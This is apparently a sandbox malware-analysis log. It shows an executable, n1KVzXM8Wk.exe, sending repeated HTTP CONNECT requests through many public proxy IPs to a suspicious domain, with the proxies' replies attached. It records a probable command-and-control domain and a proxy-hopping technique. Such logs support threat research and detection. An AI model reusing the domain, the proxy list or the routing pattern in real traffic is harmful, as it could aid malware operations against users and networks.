                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1828192.168.2.45500492.241.92.218148886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.929445028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1829192.168.2.454775175.183.82.22181976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.956855059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1830192.168.2.450458203.161.32.242529036812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.979505062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.975199938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.975860119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.974919081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.975909948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1831192.168.2.45047920.118.133.3431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.979644060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.498780012 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1832192.168.2.45481037.187.77.58189366812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.980045080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.475107908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.178402901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1833192.168.2.455023109.238.12.156469626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.980294943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.519714117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.037986994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147219896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147373915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.147042990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1834192.168.2.454788202.152.142.18680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.980386019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.146986961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.780484915 CET202INHTTP/1.0 404 Not Found
                                                                                                      Content-Length: 845
                                                                                                      Content-Type: text/html
                                                                                                      Date: Fri, 23 Feb 2024 08:45:36 GMT
                                                                                                      Expires: Fri, 23 Feb 2024 08:45:36 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1835192.168.2.455002113.204.4.142108006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.980669975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1836192.168.2.453061212.42.116.16156786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.998569965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1837192.168.2.45309178.128.81.220442866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.010354042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1838192.168.2.453100176.113.157.149374176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.012794018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1839192.168.2.45307792.246.139.106322446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.036230087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.146986961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.147103071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.146898985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:56.147317886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:08.146748066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:20.209299088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1840192.168.2.454996117.160.250.138806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.059933901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.680959940 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1841192.168.2.45503318.134.236.23131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.059935093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.221350908 CET169INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/6.0.0-20220501-re899e0c27
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1842192.168.2.455044142.54.226.21441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.065715075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1843192.168.2.450472103.165.64.8641536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.066062927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1844192.168.2.45504945.179.231.21056786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.209906101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1845192.168.2.454628192.111.134.1041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.212258101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1846192.168.2.454872200.174.198.9588886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.222731113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1847192.168.2.45454842.193.58.9680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.222913027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.672243118 CET58INHTTP/1.1 200 Connection established
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1848192.168.2.455029116.107.182.4110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.223042965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1849192.168.2.45362783.118.211.14031296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.232660055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.072529078 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/4.10
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 09:09:22 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3747
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 61 20 69 6d 67 7b 0a 09 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 0a 7d 0a 0a 74 74 20 7b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 44 32 44 34 37 3b 0a 7d 0a 0a 62 6f 64 79 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0a 09 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 73 75 70 70 6f 72 74 2e 6f 6c 66 65 6f 2e 63 6f 6d 2f 73 69 74 65 73 2f 6f 6c 66 65 6f 2f 66 69 6c 65 73 2f 66 6f 75 6e 64 61 74 69 6f 6e 5f 6c 6f 67 6f 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 23 63 6f 6e 74 65 6e 74 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 25 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 09 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 73 74 61 63 6b 3b 0a 09 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 7a 6f 6f 6d 3a 31 3b 0a 09 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 36 30 25 3b 0a 7d 0a 0a 23 6c 6f 67 6f 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 38 25 20 32 30 70 78 20 38 25 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 33 70 78 20 73 6f 6c 69 64 20 23 44 41 30 38 31 42 3b
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... a img{border-style:none;}tt {text-decoration:none; font-weight:bold;font-family:monospace;color: #1D2D47;}body{text-align:center;background-color:white;height:100%;margin:0 0 0 0;}#titles { margin-left: 15px; padding: 10px; padding-left: 100px; background: url('http://support.olfeo.com/sites/olfeo/files/foundation_logo.png') no-repeat left;}#content{margin-top:5%;text-align:left;display:-moz-inline-stack;display:inline-block;zoom:1;*display:inline;margin-left: auto;margin-right: auto;max-width:60%;}#logo{text-align:left;margin: 0 8% 20px 8%;border-bottom:3px solid #DA081B;


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1850192.168.2.450531170.82.13.12136006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.240572929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.334613085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.613293886 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1851192.168.2.454886201.91.82.15531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.241044044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.775810957 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1852192.168.2.455039183.56.243.20910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.241728067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1853192.168.2.455072104.16.109.207806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.248680115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.335577965 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1854192.168.2.455076172.67.182.85806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.253679991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.341393948 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1855192.168.2.45320392.204.134.38425716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.290921926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.365839005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1856192.168.2.455061106.14.249.8180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.306207895 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
